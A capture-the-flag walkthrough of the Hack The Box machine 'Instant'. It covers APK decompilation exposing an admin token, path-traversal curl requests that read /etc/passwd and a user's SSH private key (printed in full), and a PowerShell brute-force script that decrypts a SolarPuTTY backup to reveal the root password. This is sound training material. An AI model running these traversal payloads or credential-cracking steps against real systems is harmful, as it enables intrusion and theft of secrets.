Overview Instant is a medium-difficulty machine from Hack The Box, dealing initially with an APK file decompiling that leads to expose a new subdomain alongside an Authorization Token that will eventually allow us to leak ssh private keys to read the user flag. And finally decrypting an exposed SolarPuttY backup file where we’ll find the root password stored in it.
Instant-info-card
Reconnaissance 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 Starting Nmap 7.93 ( https://nmap.org ) at 2024 -10-14 22 :51 Arabian Standard Time NSOCK ERROR [0.2820 s ] ssl_init_helper (): OpenSSL legacy provider failed to load. Nmap scan report for 10.129 .138.194 Host is up (0.20 s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22 /tcp open ssh OpenSSH 9.6 p1 Ubuntu 3 ubuntu13.5 (Ubuntu Linux; protocol 2.0 )| ssh-hostkey : | 256 3183 eb9f15f840a5049ccb3ff6ec4976 (ECDSA) |_ 256 6 f6603470e8ae00397675b41cfe2c7c7 (ED25519) 80 /tcp open http Apache httpd 2.4 .58 |_http-title : Did not follow redirect to http://instant.htb/ |_http-server-header : Apache/2.4 .58 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93 %E=4 %D=10 /14 %OT=22 %CT=1 %CU=43149 %PV=Y%DS=2 %DC=T%G=Y%TM=670 D68 OS:54 %P=i686-pc-windows-windows )SEQ(SP =107 %GCD=1 %ISR=10 B%TI=Z%CI=Z%II =I%TS= OS:A)SEQ(CI=Z%II =I)SEQ(SP =101 %GCD=1 %ISR=102 %TI=Z%CI=Z%TS=9 )OPS(O1=M54EST11N OS:W7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%O6=M54ES OS:T11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R =Y%DF=Y%T=4 OS:0 %W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R =Y%DF=Y%T=40 %S=O%A=S+%F=AS%RD =0 %Q=)T2( OS:R =N)T3(R =N)T4(R =Y%DF=Y%T=40 %W=0 %S=A%A=Z%F=R %O=%RD =0 %Q=)T5(R =Y%DF=Y%T=40 % OS:W=0 %S=Z%A=S+%F=AR%O=%RD =0 %Q=)T6(R =Y%DF=Y%T=40 %W=0 %S=A%A=Z%F=R %O=%RD =0 %Q= OS:)T7(R =Y%DF=Y%T=40 %W=0 %S=Z%A=S+%F=AR%O=%RD =0 %Q=)U1(R =Y%DF=N%T=40 %IPL=164 % OS:UN=0 %RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R =Y%DFI=N%T=40 %CD =S) Network Distance: 2 hops Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 129.00 ms 10.10 .16.1 2 257.00 ms 10.129 .136.162 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 43.08 seconds
We can see that we have our usual ssh port alongside a web app deployed on port 80 that’s redirecting us to instant.htb, so let’s go ahead and add that entry to our /etc/hosts file.
Web App
Right away, we can see that we can download an APK file. Let’s download it and decompile it using jadx to check what we have.
Mobile App
Mobile Application - instant.apk Checking the source code, especially AdminActivities, we can find a secret admin authorization token related to a mywalletv1.instant.htb subdomain:Mobile App
I’ll also be looking at more subdomains by using apktool to get a better look at the source code:
1 2 3 4 5 6 7 8 9 10 11 12 13 ┌──(kali㉿kali)-[~/Desktop/instant] └─$ grep -iR instant.htb res/xml/network_security_config.xml: <domain includeSubdomains="true" >mywalletv1.instant.htb</domain> res/xml/network_security_config.xml: <domain includeSubdomains="true" >swagger-ui.instant.htb</domain> res/layout/activity_forgot_password.xml: <TextView android:textSize="14.0sp" android:layout_width="fill_parent" android:layout_height="wrap_content" android:layout_margin="25.0dip" android:text="Please contact [email protected] to have your account recovered" android:fontFamily="sans-serif-condensed" android:textAlignment="center" /> smali/com/instantlabs/instant/LoginActivity.smali: const-string v1, "http://mywalletv1.instant.htb/api/v1/login" smali/com/instantlabs/instant/ProfileActivity.smali: const-string v7, "http://mywalletv1.instant.htb/api/v1/view/profile" smali/com/instantlabs/instant/AdminActivities.smali: const-string v2, "http://mywalletv1.instant.htb/api/v1/view/profile" smali/com/instantlabs/instant/TransactionActivity$2 .smali: const-string v1, "http://mywalletv1.instant.htb/api/v1/confirm/pin" smali/com/instantlabs/instant/TransactionActivity.smali: const-string v0, "http://mywalletv1.instant.htb/api/v1/initiate/transaction" smali/com/instantlabs/instant/RegisterActivity.smali: const-string p4, "http://mywalletv1.instant.htb/api/v1/register"
We can see that we also have a swagger-ui.instant.htb subdomain. So let’s add those two to our /etc/hosts file.
Taking a look at the exposed swagger API, we can see a lot of endpoints:API
One fairly interesting endpoint was /api/v1/admin/read/log which takes in a log_file_name parameter.
Let’s try to make a request to that endpoint by adding our previously aquired Authorization token and trying to read local files:
1 2 3 4 ┌──(kali㉿kali)-[~] └─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=../../../../../../../etc/passwd" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" {"/home/shirohige/logs/../../../../../../../etc/passwd" :["root:x:0:0:root:/root:/bin/bash\n" ,"daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n" ,"bin:x:2:2:bin:/bin:/usr/sbin/nologin\n" ,"sys:x:3:3:sys:/dev:/usr/sbin/nologin\n" ,"sync:x:4:65534:sync:/bin:/bin/sync\n" ,"games:x:5:60:games:/usr/games:/usr/sbin/nologin\n" ,"man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n" ,"lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n" ,"mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n" ,"news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n" ,"uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n" ,"proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n" ,"www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n" ,"backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n" ,"list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n" ,"irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n" ,"_apt:x:42:65534::/nonexistent:/usr/sbin/nologin\n" ,"nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n" ,"systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin\n" ,"systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin\n" ,"dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false\n" ,"messagebus:x:101:102::/nonexistent:/usr/sbin/nologin\n" ,"systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin\n" ,"pollinate:x:102:1::/var/cache/pollinate:/bin/false\n" ,"polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin\n" ,"usbmux:x:103:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\n" ,"sshd:x:104:65534::/run/sshd:/usr/sbin/nologin\n" ,"shirohige:x:1001:1002:White Beard:/home/shirohige:/bin/bash\n" ,"_laurel:x:999:990::/var/log/laurel:/bin/false\n" ],"Status" :201}
And yes we get a hit!!
1 2 3 4 ┌──(kali㉿kali)-[~] └─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/read/log?log_file_name=../../../../../../../home/shirohige/.ssh/id_rsa" -H "accept: application/json" -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA" {"/home/shirohige/logs/../../../../../../../home/shirohige/.ssh/id_rsa" :["-----BEGIN OPENSSH PRIVATE KEY-----\n" ,"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\n" ,"-----END OPENSSH PRIVATE KEY-----\n" ],"Status" :201}
And yes we can read it! Let’s clean it and get our ssh session:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn NhAAAAAwEAAQAAAYEApbntlalmnZWcTVZ0skIN2+Ppqr4xjYgIrZyZzd9YtJGuv/w3GW8B nwQ1vzh3BDyxhL3WLA3jPnkbB8j4luRrOfHNjK8lGefOMYtY/T5hE0VeHv73uEOA/BoeaH dAGhQuAAsDj8Avy1yQMZDV31PHcGEDu/0dU9jGmhjXfS70gfebpII3js9OmKXQAFc2T5k/ 5xL+1MHnZBiQqKvjbphueqpy9gDadsiAvKtOA8I6hpDDLZalak9Rgi+BsFvBsnz244uCBY 8juWZrzme8TG5Np6KIg1tdZ1cqRL7lNVMgo7AdwQCVrUhBxKvTEJmIzR/4o+/w9njJ3+WF uaMbBzOsNCAnXb1Mk0ak42gNLqcrYmupUepN1QuZPL7xAbDNYK2OCMxws3rFPHgjhbqWPS jBlC7kaBZFqbUOA57SZPqJY9+F0jttWqxLxr5rtL15JNaG+rDfkRmmMzbGryCRiwPc//AF Oq8vzE9XjiXZ2P/jJ/EXahuaL9A2Zf9YMLabUgGDAAAFiKxBZXusQWV7AAAAB3NzaC1yc2 EAAAGBAKW57ZWpZp2VnE1WdLJCDdvj6aq+MY2ICK2cmc3fWLSRrr/8NxlvAZ8ENb84dwQ8 sYS91iwN4z55GwfI+JbkaznxzYyvJRnnzjGLWP0+YRNFXh7+97hDgPwaHmh3QBoULgALA4 /AL8tckDGQ1d9Tx3BhA7v9HVPYxpoY130u9IH3m6SCN47PTpil0ABXNk+ZP+cS/tTB52QY kKir426YbnqqcvYA2nbIgLyrTgPCOoaQwy2WpWpPUYIvgbBbwbJ89uOLggWPI7lma85nvE xuTaeiiINbXWdXKkS+5TVTIKOwHcEAla1IQcSr0xCZiM0f+KPv8PZ4yd/lhbmjGwczrDQg J129TJNGpONoDS6nK2JrqVHqTdULmTy+8QGwzWCtjgjMcLN6xTx4I4W6lj0owZQu5GgWRa m1DgOe0mT6iWPfhdI7bVqsS8a+a7S9eSTWhvqw35EZpjM2xq8gkYsD3P/wBTqvL8xPV44l 2dj/4yfxF2obmi/QNmX/WDC2m1IBgwAAAAMBAAEAAAGARudITbq/S3aB+9icbtOx6D0XcN SUkM/9noGckCcZZY/aqwr2a+xBTk5XzGsVCHwLGxa5NfnvGoBn3ynNqYkqkwzv+1vHzNCP OEU9GoQAtmT8QtilFXHUEof+MIWsqDuv/pa3vF3mVORSUNJ9nmHStzLajShazs+1EKLGNy nKtHxCW9zWdkQdhVOTrUGi2+VeILfQzSf0nq+f3HpGAMA4rESWkMeGsEFSSuYjp5oGviHb T3rfZJ9w6Pj4TILFWV769TnyxWhUHcnXoTX90Tf+rAZgSNJm0I0fplb0dotXxpvWtjTe9y 1Vr6kD/aH2rqSHE1lbO6qBoAdiyycUAajZFbtHsvI5u2SqLvsJR5AhOkDZw2uO7XS0sE/0 cadJY1PEq0+Q7X7WeAqY+juyXDwVDKbA0PzIq66Ynnwmu0d2iQkLHdxh/Wa5pfuEyreDqA wDjMz7oh0APgkznURGnF66jmdE7e9pSV1wiMpgsdJ3UIGm6d/cFwx8I4odzDh+1jRRAAAA wQCMDTZMyD8WuHpXgcsREvTFTGskIQOuY0NeJz3yOHuiGEdJu227BHP3Q0CRjjHC74fN18 nB8V1c1FJ03Bj9KKJZAsX+nDFSTLxUOy7/T39Fy45/mzA1bjbgRfbhheclGqcOW2ZgpgCK gzGrFox3onf+N5Dl0Xc9FWdjQFcJi5KKpP/0RNsjoXzU2xVeHi4EGoO+6VW2patq2sblVt pErOwUa/cKVlTdoUmIyeqqtOHCv6QmtI3kylhahrQw0rcbkSgAAADBAOAK8JrksZjy4MJh HSsLq1bCQ6nSP+hJXXjlm0FYcC4jLHbDoYWSilg96D1n1kyALvWrNDH9m7RMtS5WzBM3FX zKCwZBxrcPuU0raNkO1haQlupCCGGI5adMLuvefvthMxYxoAPrppptXR+g4uimwp1oJcO5 SSYSPxMLojS9gg++Jv8IuFHerxoTwr1eY8d3smeOBc62yz3tIYBwSe/L1nIY6nBT57DOOY CGGElC1cS7pOg/XaOh1bPMaJ4Hi3HUWwAAAMEAvV2Gzd98tSB92CSKct+eFqcX2se5UiJZ n90GYFZoYuRerYOQjdGOOCJ4D/SkIpv0qqPQNulejh7DuHKiohmK8S59uMPMzgzQ4BRW0G HwDs1CAcoWDnh7yhGK6lZM3950r1A/RPwt9FcvWfEoQqwvCV37L7YJJ7rDWlTa06qHMRMP 5VNy/4CNnMdXALx0OMVNNoY1wPTAb0x/Pgvm24KcQn/7WCms865is11BwYYPaig5F5Zo1r bhd6Uh7ofGRW/5AAAAEXNoaXJvaGlnZUBpbnN0YW50AQ== -----END OPENSSH PRIVATE KEY-----
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(kali㉿kali)-[~] └─$ ssh -i id_rsa [email protected] Welcome to Ubuntu 24.04.1 LTS (GNU/Linux 6.8.0-45-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro This system has been minimized by removing packages and content that are not required on a system that users do not log into. To restore this content, you can run the 'unminimize' command . shirohige@instant:~$ cat user.txt 444dc5a4a564078744b54c37dbda9316 shirohige@instant:~$
And we get our user flag!
Privilege Escalation - SolarPuTTY Session Decryption Looking at what we have access to, we find a sessions-backup.dat file under /opt/backups/Solar-PuTTY which is a SolarPutty session backup. For that there’s an amazing tool named SolarPuttyDecrypt . For that I created a small powershell script to bruteforce the decryption of our putty session:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 $rockyouPath = "C:\Users\0xkujen\Desktop\HackThebox\HTB_Machines\Instant\rockyou.txt" $decryptExePath = "SolarPuttyDecrypt_v1/SolarPuttyDecrypt.exe" $sessionsFilePath = "sessions-backup.dat" function Invoke-SolarPuttyBruteforce Get-Content -Path $rockyouPath | ForEach-Object { $password = $_ .Trim() try { & $decryptExePath $sessionsFilePath $password } catch { Write-Output "Error: $_ " } } } Invoke-SolarPuttyBruteforce
We execute it and wait for some time:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 ----------------------------------------------------- SolarPutty's Sessions Decrypter by VoidSec ----------------------------------------------------- { "Sessions": [ { "Id": "066894ee-635c-4578-86d0-d36d4838115b", "Ip": "10.129.138.194", "Port": 22, "ConnectionType": 1, "SessionName": "Instant", "Authentication": 0, "CredentialsID": "452ed919-530e-419b-b721-da76cbe8ed04", "AuthenticateScript": "00000000-0000-0000-0000-000000000000", "LastTimeOpen": "0001-01-01T00:00:00", "OpenCounter": 1, "SerialLine": null, "Speed": 0, "Color": "#FF176998", "TelnetConnectionWaitSeconds": 1, "LoggingEnabled": false, "RemoteDirectory": "" } ], "Credentials": [ { "Id": "452ed919-530e-419b-b721-da76cbe8ed04", "CredentialsName": "instant-root", "Username": "root", "Password": "12**24nzC!r0c%q12", "PrivateKeyPath": "", "Passphrase": "", "PrivateKeyContent": null } ], "AuthScript": [], "Groups": [], "Tunnels": [], "LogsFolderDestination": "C:\\ProgramData\\SolarWinds\\Logs\\Solar-PuTTY\\SessionLogs" } ----------------------------------------------------- [+] DONE Decrypted file is saved in: C:\Users\0xkujen\SolarPutty_sessions_decrypted.txt
And we get our root password! Let’s get our root flag now:
1 2 3 root@instant:~ 90620fd97392d21c28b2309bfa1dac09 root@instant:~
And that was it for Instant, hope you learned something new!
-0xkujen
